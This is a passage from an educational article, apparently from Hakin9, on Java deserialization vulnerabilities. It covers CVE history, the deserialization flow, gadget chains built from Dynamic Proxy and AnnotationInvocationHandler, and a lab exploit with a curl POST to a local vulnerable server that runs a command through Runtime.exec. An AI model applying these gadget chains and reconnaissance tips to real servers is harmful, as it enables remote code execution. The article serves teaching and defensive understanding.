JavaDeserH2HC.git

$ cd JavaDeserH2HC

Serialization is started by the writeObject() of ObjectOutputStream invoked by the TestSerialize class (high-

lighted at the left). However, note that the writeObject () method of the Alien class itself (corresponding to the 

object being serialized) is invoked during this phase - as can be seen from the message displayed in terminal: "Serializ-

ing an object of class: Alien".

In turn, deserialization is performed by the ObjectInputStream.readObject() method (highlighted directly in 

TestDeserialize class). Similarly, the code in readObject() of the Alien class (the type which object is being deserial-

ized) is also automatically executed. For this behavior, such methods (which "auto run") were baptized magic 
methods - this is a fundamental detail.
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In addition, by default, component B proceeds with deserialization (object graph reconstruction from byte stream), 

without performing content validation (i.e. there is no guarantee that the object is even Alien type) – an Improper In-

put Validation [7] classic failure. Only after the object "reconstruction" is completed, an attempt to convert it to the 

expected type is performed (cast). Consequently, an attacker could send / make available objects of arbitrary types 

(not just those that are expected) and expect that the application will proceed with deserialization (and consequent exe-

cution of the readObject() method) - even if, in the end, this results in a cast error and the object is discarded. Al-

though this process may seem harmless, by combining this Improper Input Validation with a Code-Reuse Attack [8] 

"variant", the possibilities are amplified. In this context, in practical terms, the ability to manipulate / control objects 

properties (fields) and their respective injection into such inputs (Object Injection) is what can lead to arbitrary effects 

(e.g. deviation/redirect of execution flow). Because of this behavior, the technique was called Property-Oriented Pro-

gramming (POP) [9], which is a high-level Code-Reuse Attack class. In fact, this scenario is so significant that it be-

came a class of vulnerabilities itself, described by CWE-502 [1] and classified in OWASP [10] as Deserialization of Un-

trusted Data. In addition, in 2017, it was included in OWASP's Top 10 list - which describes the top 10 risks in web ap-

plications. In Java (JVM) context, a potential remote code execution (RCE) becomes possible if at least the following 

two conditions are fulfilled:

• CONDITION 1: Application / platform perform unsafe deserialization (which is default in JVM) of data pro-

vided by untrusted sources (e.g. users);

• CONDITION 2: If there is a "dangerous" code in the application / platform classpath that can be reused (e.g., 

serializable class that handles / invokes methods in user-controlled fields).

Both conditions are fundamental and there are flaws (with CVEs) for both the first case and the second (which need to 

be combined to reach a potential RCE). With respect to the latter, classes (codes) present in the classpath that can be 

utilized (reused) were named gadgets - referring to the term used by Shacham in Return-Oriented Programming 

technique (ROP) [8]. In turn, since the final payload generally takes advantage of multiple of these chained / com-

bined gadgets, the term gadget chain was used - also in reference to the terminology used in ROP. Given these spe-

cific circumstances, considering a sufficient number of gadgets available in the application's classpath, deserialization 

can provide the attacker with a Turing- complete language that allows him to perform arbitrary computational opera-

tions on JVM - with no need of code injection [11]. The following subsection discusses, in general terms, the evolution 

of some events related to this class of vulnerabilities in the context of Java. Subsequently, the document provides didac-

tic examples of how exploitations develops.

Short History

Although the subject has returned to the public spotlight since November 2015, after the CVE-2015-7450 [12] [13] 

(which reveals gadgets in the almost ubiquitous library commons-collections), the exploitation history of these vulner-

abilities dates back a long time - affecting both server-side and client-side (e.g. applet sandbox escaping). The core of 

the problem, inherent in the deserialization mechanism itself in Java (JVM), was demonstrated by Marc Schoenefeld 
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as early as 2004 [14]. Its Proof of Concept (PoC) resulted in Denial of Service (DoS) only using native Java Runtime 

Environment (JRE) code. Then other vulnerabilities emerged, but for some time the attacks were "limited" to DoS.

Years later, among others, came the CVE-2008-5353 (client-side), which deals with deserialization vulnerability in the 

java.util.Calendar class [15]. By allowing remote code execution (RCE) through Java Applets, it received attention and 

was used for a while for malware dissemination.

With regards to server-side flaws, at least since 2011, critical vulnerabilities in widely adopted Java Web technologies / 

frameworks have been publicly known. One of them was CVE-2011-2894, published by Wouter Coekaerts, which af-

fects (reuse) components of Spring AOP [16]. An exploit was made available in 2013 by Alvaro Muñoz when it was 

among the top 5 most prevalent vulnerabilities [17].

Pierre Ernst came with CVE-2012-4858, pointing out a vulnerable input in IBM Cognos BI. Soon after, in January of 

2013, he posted the remarkable Look-ahead Java Deserialization [18] article, in which he explained the problems of 

insecure deserialization (standard in JVM) and suggested a solution using the look-ahead technique. The suggestion 

essentially consisted of type-checking before deserialization.

Among others disclosed by Pierre Ernst, there is CVE-2013-2186, which exploits a class of the popular commons-

fileupload library (DiskFileItem class) and makes it possible to write files in filesystem (if used in conjunction with a 

null-byte) [19]. Also, noteworthy is CVE-2013-4444, which allows code reuse during injected object garbage-collection 

(deletion of files via finalize() method) [20].

Dinis Cruz, Abraham Kang and Alvaro Munõz presented [21], in DefCon2013, vulnerabilities in the XMLDecoder and 

XStream libraries (CVE-2013-7285) - both used for deserialization of objects in XML format. The first is an integral 

part of the JRE and used by the Restlet framework (CVE-2013-4221), while the second is adopted by important pro-

jects (e.g. Jenkins, SpringMVC, OpenMRS, Struts2 REST plugin). In addition to the vulnerabilities pointed out in 

2013, it should be noted that XStream allows (de)serialization of any class (regardless of whether or not to implements 

the Serializable interface) and, as in the native process, invokes the magic methods (when present). In this way, by 

default, it can be considered an instance of native deserialization, but with the potential to increase the attack surface 

(it was used, for example, in CVE-2017-9805, Struts2-REST plugin, which was recently published). Other pertinent 

CVEs were published the same year by other researchers, such as Takeshi Terada [22].

By 2012-2013, botnets made up of JBoss Application Servers grew. Among the main exploitation vectors, some have 

been known since the CVE-2007-1036 - although attack techniques have not yet used deserialization. Subsequently, 

duplicate CVEs were published on the same vectors (i.e. JMXInvokerServlet and EJBInvokerServlet, CVE-2012-0874 

and CVE-2013-4810) and new forms of attacks have appeared. In 2014, the first version of the JexBoss tool [23] was 

published, which made it possible to validate/exploit them (and to suggest corrective actions), using deserialization 

techniques (code reuse via readExternal ()). Unfortunately, the tool was also used by criminals to disseminate the Ran-

somware Samas [24] and by nation-states for cyber espionage purposes [25].
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Android joined the list with the publication of CVE-2014-7911, in which Jann Horn revealed a bug in implementing Ob-

jectInputStream itself [26] (responsible for the deserialization process). As a result, any object could be deserialized, 

even if it did not implement the Serializable or Externalizable interface - thus amplifying condition 2 (code reuse at-

tack). Later it was published as CVE-2015-3837, which abuses the OpenSSLX509Certificate class. The authors, Peles 

and Roee Hay, provided a work detailing their mechanism [27]. Both result in the ability to execute code and escalate 

privileges.

Finally, in 2015, Chris Frohoff and Gabe Lawrence presented CVE-2015-7501 [12] [13], which uses (mainly) the code 

in the InvokerTransformer class of the commons-collections library (versions 3.X <= 3.2.1 and 4.0) - widely present in 

the classpath of Java applications and platforms. With this, condition 2 (code reuse attack) has become satisfied for 

the majority of environments. Therefore, once an input is found that performs insecure deserialization of data from 

untrusted sources (condition 1), one can readily reuse the gadget chain pointed out by that CVE and potentially obtain 

a Turing - complete language that allows remote code execution (RCE) via JVM - therefore, platform independent. As 

an example, we cite the case of PayPal, affected through an input that accepted objects via HTTP POSTs [28].

Chris Frohoff also published the ysoserial tool [29], which enables easy generation of payloads to exploit (reuse) gadg-

ets present in multiple common libraries. Later, new gadgets were presented, improved, discussed and included in the 

tool (by the author and the community).

CVE-2015-3253 is also worth mentioning, it was published by cpnrodzc7, affecting Groovy (popular library). In fact, 

Matthias Kaiser, another researcher in the field, had been aware of this vulnerability in parallel [30].

Since then, a greater number of CVEs and gadgets have emerged, especially golden-gadgets, which rely only on Java 

native code (JRE) [31] [32]. New techniques and insecure inputs have been made public - affecting important plat-

forms and technologies - such as JNDI Injection, Google GWT, Atlassian Bamboo (Matthias Kaiser), Jenkins, Ac-

tiveMQ, Log4J (pimps, CVE-2017-5645), Pivotal, Oracle Cloud, JBossMQ, Apache Camel, Apache Shiro, JBoss AS 

(CVE-2017-12149), Resteasy, Struts2-REST plugin, Jackson (CVE-2017-7525), Multiple Java Application Servers [33] 

and more. The list is extensive and potentially tends to continue.

Backstage

The best way to understand risks is by analyzing how the exploitations works. This subsection presents an overview of 

the flow that occurs during the native deserialization of objects in Java (JVM), followed by didactic examples. This is 

the basis for understanding the Code Reuse POP Attack and thus the identification of gadgets and the construction of 

the payloads (gadget chains) - in addition to the identify of injectable inputs. It should be noted, however, that exploita-

tions can be performed using public payloads (e.g., generated by the ysoserial, JavaDeserH2HC, using jexboss, etc.), 

simply by identifying an input in the application/platform that performs unsafe deserialization of data (condition 1). 

That is, with the tools and information available, multiple environments are subject to explorations - even by those 

who do not necessarily own the technical knowledge.
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Deserialization flow and vulnerable inputs

One of the important (but not the only1) points to be observed when looking for inputs exposed to native deserializa-

tion vulnerabilities is the call to the ObjectInputStream.readObject() method. It is responsible for encapsulat-

ing the process that will instantiate the class - referring to the object to be deserialized - invoke its magic methods 

(when present) and assign the values of its fields (object properties) from those received in the byte stream - besides 

other actions. Therefore, it is a red flag that indicates a potential injection point (condition 1).

It is not uncommon for serializable classes to implement their own version of readObject() (in addition to other 

magic methods), usually to execute extra logic on field values (which can be controlled by users). For teaching pur-

poses, this method can be thought of as a kind of constructor - which is automatically invoked during the deserializa-

tion of objects of the respective types (as mentioned in the example of Figure 1). As a result, these classes are usually 

the starting point for gadget action / identification (condition 2) - precisely because they execute "customized" code 

in this or other magic methods (discussed later).

Figure 2 contains an example of vulnerable ordinary input (in this case, the CVE-2017-7504), in which a piece of code 

invokes ObjectInputStream.readObject() in a byte stream received via HTTP POST.

protected void processRequest(HttpServletRequest request, 

HttpServletResponse response) throws ServletException, 

IOException  

{  
  ObjectOutputStream outputStream = new 

ObjectOutputStream(response.getOutputStream()); 

  try  {  
    ObjectInputStream inputStream = new 

ObjectInputStream(request.getInputStream());// Load data

    HTTPILRequest httpIlRequest = 

(HTTPILRequest)inputStream.readObject(); (1) 

Deserialization!

...

Figure 2 - readObject() method invoked on an ObjectInputStream containing the byte stream received via HTTP POST (source: 

https://opensource.apple.com/source/JBoss/JBoss-734/jboss-all/varia/src/main/org/ jboss / mq / il / http / servlet / HTTPServerILServlet.java.auto.html

In turn, the diagram in Figure 3 illustrates the execution flow that occurs from this call (reference (1), Figure 2) until 

its return (reference (5) in Figure 3) - essential to understand where the fragilities happens.
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Figure 3 - Object Deserialization in JVM Simplified Flow Diagram 

In the previous code part (Figure 2), as well as in the flow diagram (Figure 3), it is clear that casting (reference (5)) oc-

curs only after ObjectInputStream.readObject() returns - when a considerable amount of code has been exe-

cuted, including the magic methods readObject()/readResolve(). In reference (5), deserialization is complete.

When analyzing the diagram, once readObject() is invoked in ObjectInputStream (reference (1)), the flow goes 

through some methods until it reaches resolveClass() (reference (2)) (or resolves-ProxyClass(), when it comes 

to a Dynamic Proxy), which searches the classpath for the class corresponding to the object to be deserialized (the 

class descriptor is obtained from the byte stream by readClassDesc()). If it is found and implemented Serializable 

(or Externalizable), the class is returned and then an object is instantiated (only the constructor without arguments of 

the first non-serializable superclass is executed). The fields are then initialized with their default values and then re-

stored from the information contained in the byte stream (provided by the user / attacker) by the readSeri-

alData() method - or via default ReadObject(), if there is a "customized" readObject() in the class.

Note that a type check could be performed before reference (2) (Figure 3), by a custom ObjectInputStream, which over-

rides the resolveClass() method - thus avoiding deserialization of unexpected classes (whitelist). This is the basis 

of the look-ahead technique [18], which will be discussed again in the subsection dealing with mitigation measures.

As discussed earlier, when the class implements its own readObject() (or readExternal()) it is "automatically" 

invoked (reference (3)) (followed by readResolve(), reference (4)). These are the main scopes that can make it a 

gadget. The "custom" code in these methods, acting on user-controlled fields (properties), provides the opportunity to 

take control of the execution flow (see Property-Oriented Programming [9]). In other words, for the identifica-
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tion of classes that can be "abused" (i.e. gadgets) and the creation of payloads to reuse them (serialized final object 

containing the gadget chain), one must investigate the code contained in the magic methods (readObject(), 

readExternal(), readResolve(), finalize(), readObjectNoData(), validateObject()). In addi-

tion, it is also important to observe some "auxiliary" scopes in serializable classes, such as toString(), hash-

Code(), compare() and transform(), and beyond the invoke() (present in classes that implement Invoca-

tionHandler or MethodHandler). These are possibly achievable during deserialization (e.g. using a magic method as a 

"trampoline").

The sequence summarized in the diagram (Figure 3) will occur in all possible objects (object graph), until the byte 

stream is completely deserialized. For further details, see section 3.1 in [2].

HINT: Among the main actions to be verified in magic methods (which are "self-executing" during deserialization), 

watch out for those that act on user-controlled fields, such as: 1) invocation of their methods (e.g. toString(), 

hashCode(), compare(), get(), getX(), setX(), put(), entrySet()); 2) use of Java Reflection; 3) 

JNDI Lookups, 4) creating / manipulating sockets or files and 5) loading remote classes (URLClassLoader). These are 

examples of what is said to be "dangerous code" since they can be reused to achieve arbitrary effects (e.g., flow 

deviation, execution of methods via Reflection). Examples of how these scenarios can be "abused" are discussed in the 

following subsections.

Next, a basic debugging of the TestDeserialize class is performed using Java Debugger (JDB), to visualize, in practice, 

the thread stack shown in the diagram. A breakpoint is put on line 37, where the call to the 

ObjectInputStream.readObject() occurs - start of deserialization. Execution is initialized by the run com-

mand, and after the breakpoint, the step command advances the debugger to the magic method readObject() of 

the Alien class. Finally, where statement prints the stack up to the current point (in the magic method).

175

An Overview On Deserialization Vulnerabilities In Java Virtual Machine (JVM)

http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org


Figure 4 - Debugging native deserialization of an object to visualize the thread stack up to the magic method readObject ()

 

Notice that the stack information takes only one level depth, so that some internal methods invoked by ObjectInput-

Stream were not displayed. This is the case of readClassDesc(), readNonProxyDesc() and resolve-

Class(), which are called by readOrdinaryObject() - as shown in the indentation of these in the diagram itself 

on Figure 3. If you want to perform a more in-depth analysis, it is recommended that you use Eclipse or IntelliJ.

NOTE: If you receive a timeout error after running the run command, make sure your hostname correctly translates 

to 127.0.0.1 (e.g. Ping $ (hostname)). If not, add an entry in the/etc/hosts file.

According to what has been pointed out, it appears that when sending a serialized object to the input shown in Figure 

2, it will be deserialized and hence the code in the readObject() method of the class of the object will automatically 

run on the server (assuming it is in the application's classpath). To validate the hypothesis, Figure 5 shows the sending 

an object of the Alien class (generated in the example of Figure 1) to the input of the test lab.
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Figure 5 - Sending serialized object from Alien class to the input from the test lab

In the first window (Figure 5), the object persisted in file "ET_object.ser" is sent to the application via curl com-

mand. At next terminal, which is running test lab, it is possible to observe that, after receiving HTTP POST, a message 

is printed on the screen that is known to be carried out precisely by the code present in the readObject() method of the 

Al ien c lass: “Deseria l iz ing an object of c lass: Al ien " . Immediately af terwards, cast error 

(java.lang.ClassCastException) - which, it turns out, occurs "too late". 

Transcribing:

// on a terminal, compile and run the lab server (the -

XDignore.symbol.file parameter,

provided during compilation, it is used only to suppress 

warnings.)

$ javac VulnerableHTTPServer.java -XDignore.symbol.file

$ java VulnerableHTTPServer

// in another terminal, inject the serialized object via 

the input of the lab (Object Injection)

$ curl 127.0.0.1:8000 --data-binary @ET_object.ser

At this point it should be noted that only data are serialized (field values/instance variables and structural informa-

tion). The code, like the one contained in the readObject() method, is loaded from the class version available in the 

application's classpath. To verify, you can analyze the contents of the serialized object Alien type, used in this example 

and shown in Figure 6. Note that only data and structural information are included in byte stream - so there is no code 

reference.
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Figure 6 - Alien type serialized object Byte stream (contains only data)

In this way, it is concluded that it is not worth it for an attacker to write code in readObject() of his own class (con-

taining a call to Runtime.exec (), for example), serialize an object and "inject" it into an input of the application (as 

shown in Figure 2 and exemplified in Figure 5). In fact, the code will not even be serialized (data only). Keep in mind 

(just highlighting again) that this is a code reuse attack. This is why you should investigate classes in the application 

classpath that already have "dangerous" code in magic methods (e.g. readObject()/readResolve()) - that run or 

can be used as a "trampoline" to execute something defined by an attacker. Despite this, considering the amount of op-

tions available (whether in native classes, application classes or libraries) and that an attacker has the ability to "trig-

ger" them and control the values of their fields (when sending a serialized object from the respective type, as demon-

strated in Figure 5), the possibilities are usually extensive. 

Hint: Once you have found a code snippet similar to the example in Figure 2 (which performs the deserialization of 

objects received from untrusted sources / users), it is suggested to use an IDE (e.g. Eclipse, IntelliJ) to try to trace 

the path to the respective injection point - although it is not always possible to reach 

ObjectInputStream.readObject()/readUnshared() via an external input.

In cases where it is not possible to perform a white-box test in the system code itself (to search for the red flag 

mentioned), other methods may be employed. Just to cite options (but not intending to exhaust the subject), it is 

worth noting:

1) Search for serialized objects in headers (e.g. cookies) and HTTP parameters. This is one of the fertile 

paths. Usually, the objects are compressed and then encoded in base64. It is not uncommon, however, 

to observe the use of cryptography before coding, however using a symmetric key publicly known or 

possible to obtain (e.g. via Remote Information Disclosure failures). The most classical public example 

of using hardedcode encryption is Apache Shiro’s, which persists the object in the "rememberMe" 

cookie. The following video displays a simple, common example where an object is persisted in the 

ViewState parameter (whose content can be controlled / modified by the user / attacker): https://

www.youtube.com/watch?v=VaLSYzEWgVE

2) Analyze the common libraries used (e.g. related to the components of View / Ajax). If it is not possible 

to find the code, it is recommended to decompile the bytecodes (via the Java Decompiler (JD) or using 

the resources of the IDE itself, that usually does this transparently).
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3) Send invalid XML / JSON documents to application inputs and analyze the error message to determine 

whether the Xstream or Jackson library is used.

4) Search for previous points in the Application Server consoles and ports (e.g. JBoss, WebSphere, 

WebLogic, etc.). Many of them have are already been made public [33] [JexBoss].

5) Create a laboratory with the technologies to be investigated, as close as possible to the system being 

analyzed. Then inspect network traffic or use a java-agent (e.g. notsoserial) to identify possible 

serialized objects or calls to ObjectInputStream.readObject()/readUnshared().

Understanding gadget basics 

The following is a hypothetical example that will help you understand how the execution flow can be diverted during 

deserialization. Some of the key concepts, such as Dynamic Proxys and InvocationHandlers, will be demonstrated. 

These are fundamental for a better understanding of other mechanisms discussed in the next subsection - used by the 

payload that reuses the types (gadgets) of the Apache Commons-Collections library.

Suppose you have identified an exposed input on a particular application / platform, similar to the example in Figures 

2 and 3. The next step is to find a class (suggestive of being present in the application's classpath) that, by having a de-

serialized object, can result in an arbitrary effect (i.e. a gadget that allows exploitation through the input). This subsec-

tion addresses this process in a didactic way.

The code in Figure 7 illustrates a class that implements the Serializable interface. Notice that it has a readObject() 

customized (magic method) and apparently harmless, which prints only a text and then invokes the entrySet() 

method from map field - field that can be controlled by users.
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public class ForgottenClass implements Serializable {  
  private Map;  
  private void readObject(java.io.ObjectInputStream 

in)throws IOException, ClassNotFoundException{  
    in.defaultReadObject();  
    

System.out.println("-------------------------------------

------");  
    System.out.println("The flow is in 

ForgottenClass.readObject()");  
    map.entrySet(); // (1) map.entrySet Invoked! 

Execution flow redirect opportunity !  

  }  

  private Object readResolve(){  
    

System.out.println("-------------------------------------

------");  
    System.out.println("The flow is in the 

ForgottenClass.readResolve()");  

    return null;  

  }  

  private void anotherMethod(){  
    System.out.println("The flow is in 

ForgottenClass.anotherMethod()");  

  }  
}

Figure 7 - ForgottenClass class with custom readObject method

 

Next class (Figure 8) implements the InvocationHandler interface, in addition to Serializable. Note that readOb-

ject() also only prints a message. However, there is another method (invoke(), reference (2)) containing a danger-

ous code - which, if invoked, executes the command stored in the "cmd" field.
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public class SomeInvocationHandler implements 

InvocationHandler, Serializable {  

  private String cmd;  

  @Override  
  public Object invoke(Object proxy, Method, Object[] 

args) // (2) Method that would be dangerously reachable!

      throws Throwable {  
    

System.out.println("-------------------------------------

------");  
    System.out.println("Invoke method reached! This 

method can do something dangerous!");  

    Runtime.getRuntime().exec(cmd);  

    return null;  
  }  
  private void readObject(java.io.ObjectInputStream s)      

// magic method  
      throws java.io.IOException, ClassNotFoundException 

{  
    s.defaultReadObject();  
    

System.out.println("-------------------------------------

------");  
    System.out.println("The flow is in 

SomeInvocationHandler.readObject()");  
  }  
}

Figure 8 - SomeInvocationHandler class with custom readObject and Invoke "dangerous" method 

It is known that it is possible to serialize an object from the SomeInvocationHandler assigning any value to the "cmd" 

field (which is used by Runtime.exec() inside the invoke() method) and "inject" it through the input. However, 

this is not enough to have the command executed. Recall that during deserialization, readObject() is automatically 

invoked, but it does not make any use of this field. To succeed, you would need to redirect the execution flow to in-

voke() method (that is not a magic method). One way to achieve this effect (redirect the execution flow) is in Dy-

namic Proxy feature [34] - a feature commonly used to "trigger" gadget chains. Using this mechanism, one can use 

the first class presented (ForgottenClass, Figure 7) as a "trampoline" to the invoke() method of the second (SomeIn-
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vocationHandler, Figure 8) - and thus reach Runtime.exec(cmd). In general, Dynamic Proxy allows you to inter-

cept calls to interface methods (in this example, to the entrySet() method of Map, reference (1) in Figure 7) and 

to "proxy" them to an InvocationHandler (which implements the invoke() method, as in reference (2) in Figure 8). 

To do this, the Proxy needs to be created by implementing a desired "source" interface (in this case a Map interface) 

and initialized with the "destination" InvocationHandler (SomeInvocationHandler, which will be encapsulated "in-

side" of the Proxy) in Figure 9, ahead. Then, recapitulating the exposed scenario: it is known that there is in classpath 

an InvocationHandler with a "dangerous" method (invoke()) - but that cannot be "directly" reached (it is not a 

magic method). At the same time, there is another class (ForgottenClass) that contains a custom readObject(), 

which invokes a method in a user-controlled field (map.entrySet() in reference (1) - Figure 7). This field, in addi-

tion, implements an interface (Map interface). Although map.entrySet() would not seem to be risky, what happens 

if an application tries to deserialize an object from the ForgottenClass class that, in the map field, contains a proxy be-

tween the Map interface and the SomeInvocationHandler? When reference (1) (Figure 7) is executed, the call to the 

map.entrySet() method will be intercepted by the Proxy and dispatched precisely to the invoke() method of 

SomeInvocationHandler (which is "inside" the Proxy) - thus resulting in execution of the command. The diagram be-

low (Figure 9) helps you visualize this dynamic.

Figure 9 – ForgottenClass object deserialization flow simplified dispatch containing, in the map field, a Proxy between the Map 
interface and SomeInvocationHandler

Thus, to explore this environment, it is sufficient to proceed with the following steps:

1) Create a SomeInvocationHandler object and assign a value to "cmd" field (that is, the command you want 

to execute);

2) Create the Proxy "between" the Map Interface and SomeInvocationHandler of step 1 (this Proxy, having a 

method invoked, will shift to SomeInvocationHandler invoke() method, which is encapsulated inside 

Proxy);
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3) Create a ForgottenClass object and assign Proxy from step 2 to its "map" field (remember that this class 

invokes a map field method in its readObject (), which is automatically executed during deserialization);

4) Serialize and send the ForgottenClass object (from step 3), which contains the Proxy into the "map" field.

The code discussed in Figure 10 shows a payload implementation that reuses the mentioned gadgets. At reference (1) 

the object is serialized into a file. Then, at reference (2), the file is read and the object is deserialized in order to simu-

late a "exploitation".
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public class ExploitGadgetExample1{  
  public static void main(String[] args)  

      throws NoSuchFieldException, IllegalArgumentException, IllegalAccessException, 
       IOException, ClassNotFoundException { 
    // Instantiate a SomeInvocationHandler 

    InvocationHandler handler = new SomeInvocationHandler();  

    // Assigns a value to the instance of SomeInvocationHandler "cmd" field 

    Field fieldHandler = handler.getClass().getDeclaredField("cmd");  
    fieldHandler.setAccessible(true);  
    fieldHandler.set(handler, "touch /tmp/h2hc_2017");  

    // interface Map  

    Class[] interfaceMap = new Class[] {java.util.Map.class};  

    // Create Proxy "between" interface Map and the SomeInvocationHandler 
    Map proxyMap = (Map) Proxy.newProxyInstance(null, interfaceMap, handler);  
    // Instance of ForgottenClass (which will be serialized) 

    ForgottenClass gadget = new ForgottenClass();  

    // Add Proxy in the "map" field of ForgottenClass 

    Field = gadget.getClass().getDeclaredField("map");  

    field.setAccessible(true);  

    field.set(gadget, proxyMap); // <- places proxy in the ‘map’ field "  

    // Serializes ForgottenClass object and saves it to disk 

    System.out.println("Serializing ForgottenClass");  

    FileOutputStream fos = new FileOutputStream("/tmp/object.ser");  

    ObjectOutputStream oos = new ObjectOutputStream(fos);  

    oos.writeObject(gadget); //(1) Serialization of the object in /tmp/object.ser file  

    oos.flush();  

    // It Deserializes object from file  

    System.out.println("Deserializing ForgottenClass");  

    FileInputStream fis = new FileInputStream("/tmp/object.ser");  

    ObjectInputStream ois = new ObjectInputStream(fis);  
    ois.readObject(); //(2) Deserialization. Here the command will be executed! 
  } //end main  
}

Figure 10 - Example that reuses the ForgottenClass and SomeInvocationHandler gadgets to run a command during deserializa-
tion
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The result of the execution is shown in Figure 11. Notice that during the deserialization (after the 

ObjectInputStream.readObject()), the flow is in fact diverted to the invoke() method of InvocationHan-

dler and therefore the command is executed (touch/tmp/h2hc_2017):

Figure 11 - Code execution result from generated payload in order to simulate a exploitation

HINT: Also test the object generated in this example (/tmp/object.ser) against the Lab's web application:
$ javac VulnerableHTTPServer.java -XDignore.symbol.file

$ java VulnerableHTTPServer

// in another terminal

$ rm /tmp/h2hc_2017

$ curl 127.0.0.1:8000 --data-binary @/tmp/object.ser

$ ls --all /tmp/h2hc_2017

Deepening with gadgets from commons-collections

While the above seems somewhat an artificial example, its trigger gadget is the same as the first versions of the gadget 

chain that reuses Apache Commons-Collections1 types: there is a native InvocationHandler in the JRE (AnnotationIn-

vocationHandler - AIH, Wouter Coekaerts’ old known [35]) that invokes a method of a field(map.entrySet()) 

from its "custom" readObject(). Thus, we already have what is necessary to divert the execution flow to the in-

voke() method of classes that implements the InvocationHandler interface, including the AnnotationInvocationHan-

dler - AIH itself (using a Proxy similar to the one from previous example).

Although the invoke() method of the AIH does not have a call to Runtime.exec(cmd) (as in the example), there 

is another point of interest. Among the actions performed in the scope of the invoke() method, an attempt is made 

to retrieve a value from a Map (memberValues.get() - reference (6) in Figure 12) using a minimally controllable 
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key. This will, therefore, be the second "trampoline" used to manipulate the behavior of the application, as seen in de-

tails below.

Figure 12 shows, respectively, the constructor and the AnnotationInvocationHandler (AIH) readObject() and 

Invoke() methods (the three scopes that will be used). Similarly, to what has been previously demonstrated, the gen-

eral idea is to create a proxy between the Map interface and an AnnotationInvocationHandler (which will be called 

the internal AIH because it is encapsulated within the Proxy). Subsequently, the Proxy can be assigned to the member-

Values field of a second AIH, which will be titled "External AIH" (this is done via constructor, shown in reference 

(1)). Thus, during the deserialization of this second AIH (external AIH), the readObject() magic method will in-

voke the Proxy's entrySet() method (reference (3) in Figure 12), which will divert the execution flow to the in-

voke() method of the internal AIH. With this, in reference (6) of Figure 12 the internal AIH memberValues field 

will have the get ("key-controllable") method invoked - reaching the second desired trigger.
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// AnnotationInvocationHandler constructor

AnnotationInvocationHandler(Class<? extends Annotation> type, Map<String, 

Object> memberValues) {  
  … 

  this.memberValues = memberValues; //(1) field "memberValues" initialized 

via constructor.

                              // This field will contain the Proxy in the 

external AIH and the LazyMap in the internal AIH

// AnnotationInvocationHandler's readObject () method

private void readObject(java.io.ObjectInputStream s) //(2) invoked 

automatically during deserialization  
  …

  for (Map.Entry<String, Object> memberValue : memberValues.entrySet()) {//

(3) entrySet invoked in Proxy,

                                                                            

// this will redirect the execution flow

                                                                          

An Overview On Deserialization Vulnerabilities In Java Virtual Machine (JVM)

http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org


                                                         

                   // to the invoke() method

                                                         

                   // of the internal AIH

// AnnotationInvocationHandler invoke() method

public Object invoke(Object proxy, Method method, Object[] 

args) { //(4) internal AIH invoke method

                                  // reached after step (3)  
  String member = method.getName();//(5) member variable will 

"receive" a "entrySet" String  
  …  
  // Handle annotation member accessors  
  Object result = memberValues.get(member); //(6) get method 

is invoked in internal AIH LazyMap

                  // the value of the member variable is used 

as a key ("entrySet")

                                     // Since this key does 

not exist, he field (an LazyMap) "triggers" Chained

                                     // Transform and thus the 

command will be executed!  
Figure 12 - AnnotationInvocationHandler Constructor, readObject and Invoke that will be reused   
(source: http://hg.openjdk.java.net/jdk8u/jdk8u-dev/jdk/file/41ab7149fea2/src/share/classes/sun/reflect/annotation/AnnotationInvocationHandler. 
Java)

  

The way the memberValues.entrySet() (in readObject(), reference (3)) redirects the flow of the external AIH 

to the invoke() method of the internal AIH has already been addressed in the previous subsection (using a Proxy 

between the Map interface and the internal AIH). Before understanding how memberValues.get (member) (refer-

ence (6)) can trigger a second "trigger", it is pertinent to write something about the invoke() method (present in 

every class that implements InvocationHandler). Not infrequently, this method is associated with Java Reflection ca-

pability: a feature that allows you to modify the behavior of the application at runtime (that is, execute code that was 

not defined at compile time) - so it is another important scope to be observed during code analysis. When a Proxy is 

"triggered" (it has some method invoked) and dispatches the call to its InvocationHandler (encapsulated by it), the in-

voke() method receives its three parameters values (proxy, method, and args) "automatically”, provided accord-

ing to the "source" that "triggered" it in this case, the memberValues.entrySet() origin, which redirect the execu-

tion flow at reference (3) at Figure 12. Thus, the values of the parameters in invoke() of internal AIH (which is "in-

